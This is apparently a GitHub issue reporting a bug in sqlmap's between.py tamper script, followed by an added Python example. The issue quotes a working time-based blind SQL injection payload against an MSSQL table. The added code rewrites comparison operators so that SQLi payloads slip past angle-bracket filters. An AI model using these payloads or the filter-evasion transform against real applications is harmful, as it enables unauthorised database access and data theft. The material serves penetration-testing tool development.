
Between.py tamper script not encoding all angled brackets #511

@davey-s

Description

Hey there,

I was recently trying to perform a blind SQLi where < or > in the query caused the app to 404. I tried with the tamper script between.py and it allowed me to enumerate everything up to data extraction. However, when trying to extract data it failed, citing 404s as the reason, and when I set debugging on I could see an angle bracket was still being used, as shown below (before the last CHAR(33)):

[14:47:23] [PAYLOAD] 44 IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(test_Date AS NVARCHAR(4000)),CHAR(32))) FROM testing.dbo.Log WHERE CONVERT(NVARCHAR(4000),test_Date)>CHAR(33)),1,1)) NOT BETWEEN 0 AND 1) WAITFOR DELAY '0:0:10'--

I took the same string and replaced the > with BETWEEN...AND on a local testbed and it worked, so for whatever reason the tamper script must not be processing that particular angle bracket.

I tried to edit the relevant query in queries.xml but that threw an error, so I ended up having to manually enumerate some info, which was slow and painful, but got there in the end! ;)

Many thanks! :)
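As an added example (not sqlmap's own between.py, whose matching rules may differ), here is a small tamper-style rewrite in Python that turns every `A > B` comparison into `A NOT BETWEEN 0 AND B` and every `A = B` into `A BETWEEN B AND B`, run over the payload quoted above. It also includes a leftover-bracket check that flags exactly the failure described in the issue: a `>` surviving the transform. The function names, the regular expressions and the set of right-hand operands it accepts (integer, single-quoted string, or a call such as CHAR(33)) are my own assumptions.

```python
import re

# Constructed input: the payload quoted in the issue, which still carried a ">"
# after tampering (the CONVERT(...)>CHAR(33) comparison inside the subquery).
ISSUE_PAYLOAD = (
    "IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(test_Date AS NVARCHAR(4000)),CHAR(32)))"
    " FROM testing.dbo.Log WHERE CONVERT(NVARCHAR(4000),test_Date)>CHAR(33)),1,1))"
    " NOT BETWEEN 0 AND 1) WAITFOR DELAY '0:0:10'--"
)

# Right-hand operands we are willing to rewrite (assumed set): an integer, a
# single-quoted string literal, or a call like CHAR(33) with a flat argument list.
_RHS = r"(?P<rhs>\d+|'[^']*'|\w+\([^()]*\))"

# The negative lookbehind keeps us away from compound operators (<>, >=, !=, ==),
# which this rewrite does not know how to express with BETWEEN.
_GT = re.compile(r"(?<![<>!=])\s*>\s*" + _RHS)
_EQ = re.compile(r"(?<![<>!=])\s*=\s*" + _RHS)


def _gt_repl(m: "re.Match[str]") -> str:
    # A > B  ->  A NOT BETWEEN 0 AND B   (equivalent for non-negative, non-NULL A)
    return " NOT BETWEEN 0 AND " + m.group("rhs")


def _eq_repl(m: "re.Match[str]") -> str:
    # A = B  ->  A BETWEEN B AND B
    rhs = m.group("rhs")
    return f" BETWEEN {rhs} AND {rhs}"


def tamper(payload: str) -> str:
    """Rewrite '>' and '=' comparisons so the payload carries no angle brackets.

    Every occurrence is rewritten, including comparisons nested inside a
    subquery's WHERE clause, which is the spot the issue reports as missed.
    """
    payload = _GT.sub(_gt_repl, payload)
    payload = _EQ.sub(_eq_repl, payload)
    return payload


def leftover_angle_brackets(payload: str) -> list:
    """Offsets of any '<' or '>' still present; an empty list means the
    payload is safe to send to an app that 404s on angle brackets."""
    return [i for i, ch in enumerate(payload) if ch in "<>"]


if __name__ == "__main__":
    out = tamper(ISSUE_PAYLOAD)
    print(out)
    print("leftover brackets at:", leftover_angle_brackets(out))
```

The check is the useful part: running `leftover_angle_brackets` on every tampered payload (for instance from a wrapper around the tamper function) turns the silent 404 the issue describes into an immediate, visible failure. Note the semantic caveat in the comment: `NOT BETWEEN 0 AND B` only equals `> B` when the left-hand side is non-negative and not NULL, which holds for the UNICODE()/ASCII() style checks blind extraction normally uses.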
